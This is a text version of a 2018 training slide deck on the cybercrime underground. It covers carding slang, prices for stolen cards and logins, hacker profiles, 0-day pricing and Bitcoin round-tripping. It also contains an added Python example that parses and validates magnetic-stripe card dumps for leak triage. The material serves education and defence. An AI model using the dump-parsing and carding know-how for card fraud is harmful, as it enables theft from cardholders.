A deep walk on the dark side of information security

1. Workshop Riga – Latvia 26/10/2018 – © 2012-2018 Security Brokers
A Deep Walk on the Dark Side of Information Security: Mapping Cybercrime's new threats
Raoul «Nobody» Chiesa, Eng. Selene Giupponi
PUBLIC RELEASE

2. Agenda
- The trainers
- Kick-off
- Premises, introductions
- Underground Economy: scenarios and actors
- «Hackers»?
- Profiling
- The evolution of the 0day market
- Bitcoins
- Underground currencies
- Social networks
- Case study
- Conclusions
- Reading room
- Q&A

3. Disclaimer
- The information contained in this presentation does not infringe any intellectual property, nor does it contain tools or recipes that could be in breach of known laws.
- The statistical data presented belongs to the Hacker's Profiling Project by UNICRI and ISECOM.
- Quoted trademarks belong to their registered owners.
- The views expressed are those of the author(s) and speaker(s) and do not necessarily reflect the views of UNICRI or other United Nations agencies and institutes, nor the views of ENISA and its PSG (Permanent Stakeholders Group), nor those of Security Brokers.
- Contents of this presentation may not be quoted or reproduced except partially (10%), provided that the source of the information is acknowledged.

4. Introductions

5. Raoul «Nobody» Chiesa
- President, Founder, The Security Brokers
- Independent Special Senior Advisor on Cybercrime @ UNICRI (United Nations Interregional Crime & Justice Research Institute)
- PSG Member, ENISA (Permanent Stakeholders Group @ European Union Network & Information Security Agency)
- Founder, Board of Directors and Technical Committee Member @ CLUSIT (Italian Information Security Association)
- Steering Committee, AIP/OPSI, Privacy & Security Observatory
- Board of Directors, ISECOM
- Board of Directors, OWASP Italian Chapter
- Cultural Attaché, Scientific Committee, APWG European Chapter
- Supporter of various security communities

6. Eng. Selene Giupponi
- Founder, Head of Digital Forensics Unit, Security Brokers
- Computer Engineering Degree + Master in Computer Forensics & Digital Investigations
- Active Member of the IT Engineer Commission, Engineers Association of the Latina Province
- CLUSIT Member (Italian Information Security Association)
- IISFA Member (Information System Forensics Association, Italian Chapter)
- Technical Assessor / Expert Witness at Civil Court
- Technical Assessor / Expert Witness at Criminal Court
- Former Member of the CyberWorld Working Group @ CASD (Higher Studies Defence Center) / OSN (National Security Observatory) at the Italian Ministry of Defense

7. Our company: The Security Brokers
- We deal with extremely interesting topics, bringing the strong know-how gained from 20+ years of field experience and from our 30+ experts, very well known all over the world in the Information Security and Cyber Intelligence markets.
- Our key areas of service can be summarized as:
  - Proactive Security, with a deep specialization in TLC & Mobile, SCADA & IA, ICN & Transportation, Space & Air, Social Networks, e-health, …
  - Post-Incident: attacker's profiling, Digital Forensics (host, network, mobile, GPS, etc.), trainings
  - Cyber Security Strategic Consulting (technical, legal, compliance, PR, strategy)
  - On-demand «Ninja Teams»
  - Security Incident PR Handling & Management
  - Psychological, social and behavioural aspects (applied to cyber environments)
  - Cybercrime Intelligence: botnet takeovers, takedowns, cybercriminal bounty hunting, Cyber Intelligence Reports, interfacing with CERTs and LEAs/LEOs, …
  - Information Warfare & Cyber War (only for MoDs)
  - 0-days and Exploits – Digital Weapons
  - OSINT

8. Cybercrime
9. Digital Underground slang (cybercrime): example
- Carder - Slang for individuals who use stolen credit card account information to conduct fraudulent transactions.
- Carding - Trafficking in and fraudulent use of stolen credit card account information.
- Cashing - The act of obtaining money by committing fraud. It can be done in a variety of ways: cashing out Western Union wires, postal money orders and WebMoney; using track data with PINs to obtain cash at ATMs; draining PayPal accounts; or setting up a bank account with a fake ID to withdraw cash on a credit card account.
- CC - Slang for credit card.
- Change of Billing (COB or COBs) - Changing the billing address on a credit account to match that of a mail drop. This gives the carder full takeover of the compromised credit card account and increases the probability that the account will not be rejected when used for Internet transactions.
- CVV2 - The card security code: a 3-digit number printed on the back of the card, required by Visa, MasterCard and Discover (MasterCard's own name for it is CVC2). It is printed, not encoded on the magnetic stripe, which is why magnetic-stripe «dumps» do not contain it.
- DDoS - Distributed Denial of Service attack. The intent is to shut down a targeted website, at least for a period of time, by flooding the network with more traffic than it can handle.
- DLs - Slang for counterfeit or novelty driver's licenses.
- Drop - An intermediary used to disguise the source of a transaction (addresses, phones, etc.).
- Dumps - Copied payment card information: at least Track 1 data, but usually Track 1 and Track 2 data.
- Dump checking - Using specific software, or alternatively encoding the track data on plastic and using a point-of-sale terminal, to test whether the dump is approved or declined. This gives carders more confidence that the dumps they obtain from a seller are good, and more confidence when doing in-store carding.
- Full info(s) / «fullz» - Addresses, phone numbers, social security numbers, PINs, credit history reports and so on. Full infos are sought by carders who wish to take over the identity of a person or to sell it.
- Holos - Slang for holograms. Holograms matter to those who make counterfeit plastic credit cards, to emulate an existing security feature.
- ICQ - «I Seek You». ICQ is the most widely used instant messaging system among carders; popular in Eastern European Internet culture, it continues to be used for carding activity.
- IRC - Internet Relay Chat: a global system of servers through which users conduct real-time text-based chat, exchange files, and interact in other ways.
- IDs - Slang for identification documents. Carders market a variety of IDs, including bills, diplomas, driver's licenses, passports, or anything that can be used as an identity document.
- MSR (Magnetic Stripe Reader) - Device used for skimming payment card information and/or encoding track information on plastic.
- Phishing - Extracting information from a target using a hook (usually an e-mail purporting to be from a legitimate company). Phishers spam the Internet with e-mails in the hope of obtaining information that can be used for fraud.
- POS (Point of Sale) - A terminal through which credit cards are swiped in order to communicate with the processors that approve or decline transactions.
- Proxies - Proxy servers. Using proxy servers to mask one's identity on the Internet is widely practised among carders. Many vendors sell access to proxy servers (SOCKS, HTTP, HTTPS) and VPNs (Virtual Private Networks), which help hide the user's real IP address when committing fraud or other illegal activity on the Internet.
- Track 1 / Track 2 data - The information stored on the magnetic stripe of a payment card that contains the account information: Track 1 holds the PAN, cardholder name, expiry date and service code; Track 2 holds the PAN, expiry date and service code in a shorter, numeric-only layout.
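The track layouts defined above are what a dump-checking tool parses, and they are also what an incident responder or DLP analyst looks for when triaging a suspected leak. The following Python is an added example, not code from the presentation or from Security Brokers: it scans text for Track 1 / Track 2 records laid out per ISO/IEC 7813, masks the PAN, decodes the expiry date and service code, and runs the Luhn check so that decoys and garbage can be separated from plausible dumps. The sample text and the card numbers in it (the public 4111 1111 1111 1111 and 5500 0000 0000 0004 test PANs plus a deliberately Luhn-invalid one) are constructed for the example, and the function names are the example's own.

```python
import re
from typing import Dict, List

# Track 1 (ISO/IEC 7813): %B<PAN>^<NAME>^<YYMM><service code><discretionary data>?
TRACK1_RE = re.compile(r"%B(\d{13,19})\^([^^?]{2,26})\^(\d{2})(\d{2})(\d{3})([^?]*)\?")
# Track 2 (ISO/IEC 7813): ;<PAN>=<YYMM><service code><discretionary data>?
TRACK2_RE = re.compile(r";(\d{13,19})=(\d{2})(\d{2})(\d{3})(\d*)\?")

# Meaning of the first digit of the service code (ISO/IEC 7813): enough to tell
# whether a dump came from an international, national or chip-preferring card.
SERVICE_CODE_INTERCHANGE = {
    "1": "international",
    "2": "international, chip preferred",
    "5": "national",
    "6": "national, chip preferred",
    "7": "no interchange (private label)",
}

# Constructed sample input: ordinary lines mixed with one Track 1 record, two Track 2
# records and a decoy. The PANs are public test numbers, not real cards.
SAMPLE_TEXT = """ticket 4471: customer asked for a refund, no card data attached
%B4111111111111111^DOE/JOHN^25121011000000000000?
decoy that only looks like a track: ;1234=5678?
;5500000000000004=25121010000000000000?
;4111111111111112=25121010000000000000?
"""


def luhn_ok(pan: str) -> bool:
    """Return True if the PAN passes the Luhn mod-10 check (ISO/IEC 7812)."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:          # every second digit from the right is doubled
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def mask_pan(pan: str) -> str:
    """Keep the BIN (first 6) and the last 4 digits, star out the rest (PCI-style)."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def _record(track: int, pan: str, yy: str, mm: str, service: str, name: str = "") -> Dict:
    """Build one finding; the raw PAN is never stored, only its masked form."""
    return {
        "track": track,
        "pan_masked": mask_pan(pan),
        "name": name,
        "expiry": f"{mm}/{yy}",
        "service_code": service,
        "interchange": SERVICE_CODE_INTERCHANGE.get(service[0], "unknown"),
        "luhn_ok": luhn_ok(pan),
    }


def find_dumps(text: str) -> List[Dict]:
    """Scan text line by line and return every Track 1 / Track 2 record found."""
    found: List[Dict] = []
    for line in text.splitlines():
        for m in TRACK1_RE.finditer(line):
            pan, name, yy, mm, service, _disc = m.groups()
            found.append(_record(1, pan, yy, mm, service, name))
        for m in TRACK2_RE.finditer(line):
            pan, yy, mm, service, _disc = m.groups()
            found.append(_record(2, pan, yy, mm, service))
    return found


if __name__ == "__main__":
    for rec in find_dumps(SAMPLE_TEXT):
        verdict = "plausible dump" if rec["luhn_ok"] else "fails Luhn, likely garbage"
        print(f"track {rec['track']} {rec['pan_masked']} exp {rec['expiry']} "
              f"svc {rec['service_code']} ({rec['interchange']}): {verdict}")
```

Run as a script it prints three findings: the Track 1 record and the first Track 2 record pass Luhn, the last record does not, and the four-digit decoy never matches because a PAN is 13 to 19 digits. The Luhn check only rules out typos and junk; a dump that passes it still has to be treated as live card data and handled under PCI rules, which is why the code stores only the masked PAN.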
10. Premise
- The evolution of the so-called «hacker's underground» led to new criminal models and approaches in the cybercrime world.
- This lesson will analyze the so-called «Underground Economy», its players and scenarios, then zoom in on Bitcoin as well as other «cybercrime currencies».
- We will bring to the audience our own experiences in these critical research areas.

12. Facing the «new world» of 2020
- Videoclip: Will you be ready? (Did You Know, 2011)

13. Unexpected Escalation – «Insecurity by Default»
- 2011: the «black year» of information leaks: governments, militaries, InfoSec, the IT industry
- 2012, 2013, 2014: trends are more than scary
  - 2012: the year of «mission impossible»
  - 2013: the year of cryptolockers
  - 2014: the year of Mobile & Cloud hacking
- 2015, 2016, 2017, 2018: just name it…
- Impressive sequences of IT incidents
- No one was able to foresee this escalation
- «Impossible» targets have been hacked
- Domino effect
- The borders between cybercrime, hacktivism, cyber espionage, information warfare and cyber war are less and less clear
- Strong need to review the criminal profiles
- We must correctly weigh the psychological dynamics behind the attack modalities
- We must learn to be proactive
- We must learn how to manage a security incident, at once, in a professional manner.

14. Topics: SCADA & Industrial Automation Security, Defense in-depth, Anti-DDoS, (basic) Application Security, Cyber Intelligence, Black Ops, Human Factor, 0days, Insider's profiling, DLP, Cybercrime Intelligence, Compliances

15. Let's stop dreaming!
In order to «outperform your adversaries», you must know who they are. And, over the last 10 years, the concept of «attacker» has dramatically changed. Also, the concept of a «secure system» doesn't exist anymore (IMHO). Well, actually, it never existed…?
- Vulnerabilities brought in by vendors
- 0days market
- State-sponsored attacks
- DDoS powershot
- Cybercrime & Underground Economy
That's why this presentation will focus on something different, trying to walk you through new perspectives, providing case studies as well.
16. From «words»…

17. …to «terminologies»
- In the Information Security (InfoSec) world we have a tremendous problem: terminology.
- Each term has different meanings, depending on the context and the actors.
- That is not all, though: in recent years a new trend has emerged, adding the prefix «cyber» to most terms:
  - Cybersecurity
  - Cyber Drills
  - Cyber Exercises
  - Cyber Lawyer (OMG!!)
  - Cyber War
  - Cyber Terrorism
  - Cyber Diplomacy (cool!)
  - Cyber Espionage
  - Cyber Bullying
  - Cyber Stalking
  - Cybersex

18. Further issues…
- No common spelling: «Cybersecurity, Cyber-security, Cyber Security?»
- No common definitions: cybercrime is…?
- No clear actors: cyber crime / war / terrorism?
- No common components?
- In non-English-speaking countries, problems with correctly understanding words and terms multiply.

19. Once upon a time…
I joined the wonderful world of hacking around 1985. Back in 1996, after the operation «Ice Trap» which led to my (home) arrest in 1995, I jumped back into the underground «scene». My hacker friends told me they had just begun doing something named «Penetration Test». I had no idea WTH «that thing» was. Then I realized someone was glad to pay you in order to «hack» into something. With rules, though. It was legal. Paid in order to do what I liked most?!? Risk-free?? «You must be kidding!!!!!!!», LOL

20. Hacker generations
- The first generation (70s) was inspired by the need for knowledge.
- The second generation (1980-1984) was driven by curiosity plus a hunger for knowledge: the only way to learn operating systems was to hack them; later (1985-1990) hacking became a trend.
- The third one (90s) was pushed by a craving for hacking, meaning a mix of addiction, curiosity, learning new stuff, hacking IT systems and networks, exchanging info with the underground community. Here we saw new concepts arrive, such as hacker e-zines (Phrack, 2600 Magazine) along with BBSes.
- The fourth generation (2000-today) is driven by anger and money: often we see subjects with very low know-how, thinking that it's «cool & bragging» to be hackers, while they are not interested in hacking & phreaking history, culture and ethics. Here hacking meets politics (cyber-hacktivism) or the criminal world (cybercrime).

21. Crime -> Past
«Every new technology opens the door to new criminal approaches.» The relationship between technology and criminality has always been, since the very beginning, characterized by a kind of «competition» between the good and the bad guys, just like cat and mouse. As an example, at the beginning of the 1900s, when cars appeared, the «bad guys» started stealing them (!) …the police, in order to counter the phenomenon, made car plates mandatory… …and the thieves began stealing the car plates from cars (and/or «cloning» them).

22. Crime -> Today
- Those «cars» have been replaced by IT and ICT.
- Today's «universal currency» is information. You have the information, you have the power (at least in politics, in the business world, in our personal relationships…).
- Simply put, this happens because information can be transformed at once into «something else»:
  1. Competitive advantage
  2. Sensitive/critical information (blackmail)
  3. Money
  …that's why all of us want to «be secure». It's not by chance that it's named «IS»: Information Security.
- Examples? (of course with cyber* as the «main actor»)
  - USA, China, …
  - Stuxnet, Shamoon, etc.
  - LTT Libya
  - Telecom Italia/SISMI affair
  - Vodafone Greece
  - Belgacom…

23. About cybercrime: the main mistake
- We are speaking about an ecosystem which is too often underestimated: most of the time it is the starting point or the transit point towards different ecosystems:
  - Information Warfare
  - Black Ops
  - Industrial Espionage
  - Hacktivism
  - (private) Cyber Armies
  - Underground Economy and Black Markets
  - Organized Crime
  - Carders
  - Botnet owners
  - 0days
  - Malware factories (APTs, code-writing outsourcing)
  - Lone wolves
  - «cyber»-mercenaries, Deep Web, etc.
24. Evolution of cyber attacks

25. Bandwidth and DDoS (2002-2009)
- 125 Gbit/s (US Gov, 4 July 2009)
- 300 Gbit/s, Spamhaus / CyberBunker (2013) – http://it.wikipedia.org/wiki/CyberBunker

26. Once upon a time
Still in those years, we used to find bugs on our own:
- Sun Solaris (we [still] love you so much)
- HP/UX (harder)
- VAX/VMS, AXP/OpenVMS (very few ones)
- Linux (plenty of)
- etc…
No one was paying us for those findings. It was just phun. No one was «selling» that stuff. We used to keep them for ourselves, and occasionally «exchange» the exploits with some other (trusted) hackers.

27. Years later…
A couple of things happened. Money slowly got involved in this research-based thing. And the whole world went «always-on», «interconnected», fully IT & TLC addicted. Then cybercrime moved into its prime-time age. Money quickly got involved in this exploit race.

28. Original «profiles»
- Black-hat: those who violate information systems, with or without personal advantage. They have rallied to the «bad» side, crossing the clear demarcation line between «love for hacking» and the deliberate execution of criminal actions. For these actors it is normal to violate an information system and penetrate into its most secret corners, stealing information and, given their hacker's profile, reselling it to foreign countries.
- Grey-hat: those who don't want to be labeled as «black or white» and may consider themselves «ethical hackers». They may have performed intrusions into information systems in the past, but they have decided not to use this approach.
- White-hat: also called «hunters», they have the skills needed to be a black-hat, but they have decided to side with «the good guys». They collaborate with the authorities and the police, they are in the front row in anti-computer-crime operations, they are advisors for governments and companies; in their life they don't usually violate computer systems, or if they do, it is never for criminal purposes or for economic gain.

29. What the heck has changed, then?
- What's really changed is the attacker's typology.
- From «bored teens», doing it for «hobby and curiosity» (obviously at night, pizza box on the floor and cans of Red Bull)…
- …to teenagers and adults who are not necessarily «ICT people» or «hackers»: they just do it for the money.
- What's changed is the attacker's profile, along with its justifications, motivations and reasons.
- And Organized Crime took all of this over.
30. The actors? Profiling «hackers»

31. Criminal Profiling vs Hacking
- Shared aspects
  - Seriality: both IT attacks and serial crimes are «serial».
  - Virtuality: both from a psychological and a moral-ethical perspective, the actors somehow gain a «mental distance» from the crimes they are executing.
- Different aspects
  - A hacker's modus operandi is not easy to identify:
    - the ease of getting access to dedicated software resources (tools), as well as «ready to go» infrastructures and resources, makes it much harder to perform a complete analysis of the attack and to profile the threat agent;
    - legislation does not allow real backtracing of the attacker (attribution).
  - Strategies and attack methodologies differ and reflect the heterogeneous motivations of the offenders.
  - The crime scene is not a physical place.

32. HPP v1.0
Back in 2004 we launched the Hacker's Profiling Project (HPP): http://www.unicri.it/special_topics/cyber_threats/
Since that year:
- over 1,200 questionnaires collected & analyzed
- 9 hacker profiles emerged
- two books (one in English):
  - Profilo Hacker, Apogeo, 2007
  - Profiling Hackers: the Science of Criminal Profiling as Applied to the World of Hacking, Taylor & Francis Group, CRC Press (2009)

33. Evaluation and correlation standards
- Modus Operandi (MO)
- Lone hacker or member of a group
- Motivations
- Selected targets
- Relationship between motivations and targets
- Hacking career
- Principles of the hacker's ethics
- Crashed or damaged systems
- Perception of the illegality of their own activity
- Effect of laws, convictions and technical difficulties as a deterrent
Respondents mainly from: USA, Italy, UK, Canada, Lithuania, Australia, Malaysia, Germany, Brazil, Romania, China

34. HPP v1.0 - Zoom: correlation standards
Gender and age group; background and place of residence; how hackers view themselves; family background; socio-economic background; social relationships; leisure activities; education; professional environment; psychological traits; to be or to appear: the level of self-esteem; presence of multiple personalities; psychophysical conditions; alcohol & drug abuse and dependencies; definition or self-definition: what is a real hacker?; relationship data; handle and nickname; starting age; learning and training modalities; the mentor's role; technical capacities (know-how); hacking, phreaking or carding: the reasons behind the choice; networks, technologies and operating systems; techniques used to penetrate a system; individual and group attacks; the art of war: examples of attack techniques; operating inside a target system; the hacker's signature; relationships with the system administrators; motivations; the power trip; lone hackers; hacker groups; favourite targets and reasons; specializations; principles of the Hacker Ethics; acceptance or refusal of the Hacker Ethics; crashed systems; hacking/phreaking addiction; perception of the illegality of their actions; offences perpetrated with the aid of IT devices; offences perpetrated without the use of IT devices; fear of discovery, arrest and conviction; the law as deterrent; effect of convictions; leaving the hacker scene; beyond hacking
35. The 9 profiles
Offender | ID | Lone / group hacker | Target | Motivations / purposes
Wanna Be Lamer | 9-16 years: «I would like to be a hacker, but I can't» | Group | End-user | For fashion, it's «cool» => to boast and brag
Script Kiddie | 10-18 years: the script boy | Group, but they act alone | SMEs / specific security flaws | To give vent to their anger / attract mass-media attention
Cracker | 17-30 years: the destroyer, scorched earth | Lone | Business company | To demonstrate their power / attract mass-media attention
Ethical Hacker | 15-50 years: the «ethical» hacker's world | Lone / group (only for fun) | Vendor / technology | For curiosity (to learn) and altruistic purposes
Quiet, Paranoid, Skilled Hacker | 16-40 years: the very specialized and paranoid attacker | Lone | On necessity | For curiosity (to learn) => egoistic purposes
Cyber-Warrior | 18-50 years: the soldier, hacking for money | Lone | «Symbol» business company / end-user | For profit
Industrial Spy | 22-45 years: industrial espionage | Lone | Business company / corporation | For profit
Government Agent | 25-45 years: CIA, Mossad, FBI, etc. | Lone / group | Government / suspected terrorist / strategic company / individual | Espionage / counter-espionage / vulnerability test / activity-monitoring
Military Hacker | 25-45 years | Lone / group | Government / strategic company | Monitoring / controlling / crashing systems
36.
Profile | May be linked to | Will change its behaviour? | Target (new) | Motivations & purposes
Wanna Be Lamer | – | No | – | –
Script Kiddie | Urban hacks | No | Wireless networks, Internet cafés, neighbourhood, etc. | –
Cracker | Phishing, spam, black ops | Yes | Companies, associations, whatever | Money, fame, politics, religion, etc.
Ethical Hacker | Massive vulnerabilities | Probably | Competitors (Telecom Italia affair), end-users | Big money
Quiet, Paranoid, Skilled Hacker | Black ops | Yes | High-level targets | Esoteric requests (e.g., «hack Thuraya for us»)
Cyber-Warrior | CNI attacks, government attacks | Yes | «Symbols»: from the Dalai Lama to the UN, passing through CNIs and business companies | Intelligence?
Industrial Spy | – | Yes | Business company / corporation | For profit
Government Agent | – | Probably | Government / suspected terrorist / strategic company / individual | Espionage / counter-espionage / vulnerability test / activity-monitoring
Military Hacker | – | Probably | Government / strategic company | Monitoring / controlling / crashing systems
37. Deterrence effect of:
Profile | Laws | Convictions suffered by other hackers | Convictions suffered by them | Technical difficulties
Wanna Be Lamer | NULL | NULL | ALMOST NULL | HIGH
Script Kiddie | NULL | NULL | HIGH: they stop after the 1st conviction | HIGH
Cracker | NULL | NULL | NULL | MEDIUM
Ethical Hacker | NULL | NULL | HIGH: they stop after the 1st conviction | NULL
Quiet, Paranoid, Skilled Hacker | NULL | NULL | NULL | NULL
Cyber-Warrior | NULL | NULL | NULL | NULL: they do it as a job
Industrial Spy | NULL | NULL | NULL | NULL: they do it as a job
38. HPP v2.0: what happened?
VERY simple: lack of funding. For phases 3 & 4 we need support: HW, SW, analysts, translators.
We started back in 2004 with «romantic hackers», though we did foresee those «new» actors: .GOV, .MIL, intelligence.
We missed out:
- Hacktivism (!)
- Cybercriminals beyond the «hobbyist» approach
- OC (Organized Crime)
- The financial aspects (Follow the Money!!)
- Cyberterrorists (do they really exist?)

39. HPP v2.0: next enhancements
Going after cybercriminals:
- Kingpins & masterminds (the «Man at the Top»)
  - Organized Crime
  - MO, business model, kingpins – «How To»
- Techies hired by Organized Crime (e.g. Romania & skimming at the very beginning; Nigerian 419-like cons; Ukrainian rogue AV; pharma ad campaigns; ESTDomains in Estonia; POS malware; etc.)
- Structure, infrastructures (links with governments & militaries?)
- Money laundering: follow the money (e-mules & new ways to «cash out»: mPOS, vPOS, etc.)
- Outsourcing: malware factories (Stuxnet? DuQu?? Lingbo? Regint? What about all of the rest…??)

40. And, it's not just «hackers»

41. Why «cybercrime»?
«2011 cybercrime financial turnover apparently exceeded the turnovers of drug dealing, human trafficking and weapons trafficking» – various sources (UN, USDOJ, INTERPOL, 2011)
Financial turnover, 2011 estimate: 6-12 billion USD/year
«Cybercrime ranks as one of the top four economic crimes» – PricewaterhouseCoopers, Global Economic Crime Survey 2011
2018: (at least) 80 billion USD/year

42. Cybercrime: key points
- Cybercrime: «the use of IT tools and telecommunication networks in order to commit crimes in different manners».
- The axiom of the whole model: «acquiring different types of data (information), which can be transformed into money».
- Key points:
  - Virtual (pyramidal approach, anonymity, C&C, flexible and scalable, moving quickly and rebuilding fast, use of «cross» products and services in different scenarios and different business models)
  - Transnational
  - Multi-market (buyers)
  - Differentiated products and services
  - Low «entry fee»
  - ROI (Return on Investment) on each single operation, which means that, exponentially, it can be industrialized
  - Tax & (cyber) law haven

43. Cybercrime's scenario: HIGHLY COMPLEX
- Actors
  - We'll speak about this later
- Motivations
  - Fame
  - Money
  - Ideals
  - Nothing (?)
- Products/services
  - Campaigns on affiliation, traffic generation/boosting, advertising, etc.
  - Dozens of services and products available: human creativity definitely works!
  - We'll see many of them today
- Legislation
  - Not present in all countries for all of the crimes
  - Lack of international cooperation
  - Cybercrime: deep presence in countries with internal issues

44. «Deliverables» of cybercrime
- ID theft
  - Personal info
- Credit identity theft
  - Financial info: e-banking logins, CC/CVV, «fullz», etc.
- Hacking
  - Towards e-commerce, e-banking, credit processing centers
- Industrial espionage
- Malware
  - Viruses, worms, spyware, keyloggers, rogue AV, botnets, mobile
- Hacking on demand
- DDoS attacks
  - Blackmail, hacktivism
- Spam
- Counterfeiting
  - Medicines, luxury goods, products & services
- Gambling
  - Money laundering
  - Fake sites / sites not authorized by national authorities
- Generic porn
  - Fake sites, etc.
- Child pornography (minors and infants)
45. Today's scenario (cybercrime): ABN AMRO case study

46. Getting cybercrime's ROI

47. Why is all of this happening?
Because users are stupid (or «naive», uneducated, not aware, etc…)
Videoclip: the «wizard» from Belgium

48. Cybercrime: reasons
1. There are new users, more and more every day: this means the total amount of potential victims and/or attack vectors is increasing (thanks to broadband, 3G/LTE and «always-on»).
2. Making money, «somehow and straight away» (worldwide economic crisis…).
3. Public availability of technical know-how, ready to go, even when talking about average-to-high skills: that's what I call «hacking prêt-à-porter» (0-days, Internet distribution system / black markets).

49. Cybercrime: reasons /2
4. It's extremely easy to recruit «idiots» and set up groups, moulding those adepts to the bad guy's needs (think about e-mules) (newbies, script kids).
5. «They will never bust me» (psychology, criminology).
6. Lack of violent actions (psychology and sociology).

50. Cybercrime business model -> the «RBN model» (Russian Business Network)

51. OC (Organized Crime) meets cybercrime -> command chain (and operating phases)

52. OC (Organized Crime) meets cybercrime -> approach by «operative macro-units»

53. Cybercrime business model 2

54. Examples (real ones)
55. Examples (real ones)
In order to certify their own credibility, «vendors» often provide «demo» credit cards. This means the buyer is able to verify that the seller is «in good faith». Here we can see that the demo provided by the seller includes every kind of data related to the owner of the credit card («fullz»).

56. Examples (real ones)
BOA, CITI, CHASE.COM LOGIN EMAIL+PASS FULLS COMPLETE
BALANCE: $25000 verified – PRICE: $525
US Visa / US MasterCard: $2.5
Random ITALY cc: $17

57. Diebold and Russia
…while not forgetting about the malware on Diebold ATMs (2009-2012?)

58. Examples (real ones)

59. Examples (real ones): $146K USD/week

60. Examples (real ones)

61. Examples (real ones)
Recently a gang of cybercrooks was accused of a fake AV fraud campaign: investigators said the revenue was around 100 million USD over one year.

62. Examples (real ones)

63. Examples (real ones)
64. Examples (real ones): structure of a carding forum (from the diagram on the slide)
  Site management (1st level): Admins, who run the escrow service and control membership
  Global Moderator: supervises content
  Moderators: arbitrate disputes and monitor individual topic areas
  Reviewers: assess the quality of vendor products
  Reviewed Vendors and Trial Vendors: have permission to sell goods/services to forum members
  Members: fraudsters, hackers/coders, data thieves
65. Examples (real ones): cloned cards
  - Templates used to manufacture cloned cards
  - Blanks produced
  - High-quality holograms
  - "Dumps" data encoded on the magstripe; an embosser is used to print the card details on the front
66. Examples (real ones): early arrests. Markus Kellerer aka Matrix001 and five others, May-Oct. 2007, Germany (co-founder). Renu Subramaniam aka JiLsi, July 2007, United Kingdom (founder).
67. Examples (real ones): Max Butler, aka Iceman, September 2007, San Francisco/Richmond. Founder of CardersMarket; $86 million in actual fraud loss.
68. Examples (real ones)
69. Examples (real ones)
70. Examples (real ones)
71. Examples (real ones): March / May 2010
  - March/May 2010, Turin (North-West of Italy)
  - Turin has the biggest Romanian community in Italy.
  - We also have a very big Nigerian community.
  - Historically, Romanian gangs drive the business of ATM skimmers...
  - ...and Nigerians the cocaine business.
  - After a joint FBI / US Secret Service / Interpol / Italian Postal Police operation, the Romanians decided to "sell" the business to the Nigerians.
  - Cloned cards were paid for with cocaine.
  - This happened because the Romanians also run the prostitution business...
  - ...and prostitutes' customers want coke as well.
  - Compared to these guys, Scarface was nearly a kid :)
72. Differences → Cybercrime ≠ "hackers"
73. What came up in 2015? «Malware evolution» on POS systems
74. Malware evolution on POS
75. Malware evolution on POS
76. Point-of-Sale related crimes
77. Malware evolution on POS
78. Malware evolution on POS
79. Malware evolution on POS
80. Malware evolution on POS
81. Malware evolution on POS
82. Cashing out
83. Malware evolution on POS
84. Malware evolution on POS
85. Malware evolution on POS
86. Malware evolution on POS
87. NFC, the next nightmare
88. NFC, the next nightmare
89. NFC, the next nightmare
90. Who's who
91. ...From RBN up to now... things evolved
92. Videoclip time!
93. 0days market
94. The pricing debate: I think all of you remember this. Source: Forbes, "Shopping For Zero-Days: A Price List For Hackers' Secret Software Exploits", 2012, http://www.forbes.com/sites/andygreenberg/2012/03/23/shopping-for-zero-days-an-price-list-for-hackers-secret-software-exploits
95. The pricing debate: what about this? (cheap but lame: the Indian ones)
96. Where's the truth? What's the right approach to «pricing»?
97. 0-days scenarios: who would buy/trade this stuff from someone who found a vuln -> exploit -> 0day? Some hacker folks :) (who, eventually, may resell it to one of the following):
  - IT vendors
  - Security vendors
  - Big Internet players
  - 0day «brokers»
  - LI (lawful interception) private companies
  - Law Enforcement Agencies (LEAs)
  - Intelligence Agencies (IAs)
  - Cybercrime / Organized Crime (the drug cartels in Mexico, ever heard about them?)
  - Pwning contests, CTFs, etc.
  - (Hacktivists?)
98. Getting the big picture → 0-day markets. A 0-day software «bug» either goes to the vendor, a CERT (ICS-CERT) or national institutions and ends up in a patch (software release x.y.z), or it goes to the white (?) market, the black market (underground) or the black market (cybercrime).
99. A different (more serious?) approach. Cost of a 0-day exploit code + PoC by buyer typology (IS = IT security companies; INT = intelligence agencies for governmental use, i.e. national security protection; MIL = MoD and related actors for warfare use; OC = cybercrime):

  Vulnerability publicly known?   Buyer   Cost (min – max)
  Y                               IS      10K – 50K USD
  Y                               INT     30K – 150K USD
  Y                               MIL     50K – 200K USD
  Y                               OC      5K – 80K USD
  N                               ALL     x2 – x10

100. A different (more serious?) approach. Same scheme, also by the component the vulnerability lies in (OS = operating system; MGA = major general applications; SCADA = SCADA / industrial automation):

  Publicly known?   Component   Buyer   Cost (min – max)
  Y                 OS          OC      40K – 100K
  Y                 MGA         INT     100K – 300K
  Y                 SCADA       MIL     100K – 300K
  N                 OS          MIL     300K – 600K
  N                 SCADA       MIL     400K – 1M
101. Not a «very well known» world
103. Finfisher
104. Global, dirty business
  - "Mass interception of entire populations is not only a reality, it is a secret new industry spanning 25 countries."
  - "It's estimated that the global computer surveillance technology market is worth $5 billion a year."
105. Who do you want to sell (your 0days) to?
106. On Bitcoins
107. Bitcoins
  - A peer-to-peer digital currency that is pseudonymous.
  - The identity of the individual is disguised, but his/her transactions are open to the public.
  - It is anonymous only to the extent that it is difficult to relate a digital identity to an actual person.
  - Bitcoins have huge implications for money laundering.
  - Various government institutions around the world are starting to view it as an area requiring regulation.
108. Bitcoins
  - Bitcoins are created through a process of "mining", in which users who provide their computing power verify and record payments into a public ledger, in exchange for transaction fees and newly minted bitcoins.
  - This process is akin to a central bank printing new money, but is less centralised.
109. On Bitcoins: why is it important to business?
  - Botnets steal your computing power to either: 1) "mine" more bitcoins (similar to SETI, but more nefarious); 2) conduct various cybercrimes.
  - If your networks are insecure, you are indirectly facilitating cybercriminals.
110. Bitcoins
111. Bitcoins
112. Bitcoins
113. Round-tripping with Bitcoins (the full presentation of this project is available in the Annexes: WEF – Bitcoins Tracking Project). Flow shown: illegal money (acquired through click fraud, carding, etc.) → exchanger (a verified exchanger or peers, e.g. Mt. Gox, Coinbase, Bitstamp, or anyone else willing) → Bitcoin account → "smurfed" Bitcoin account(s) → cash out (money transferred or taken out from the exchanger).
114. Round-tripping with Bitcoins (the full presentation of this project is available in the Annexes: WEF – Bitcoins Tracking Project)
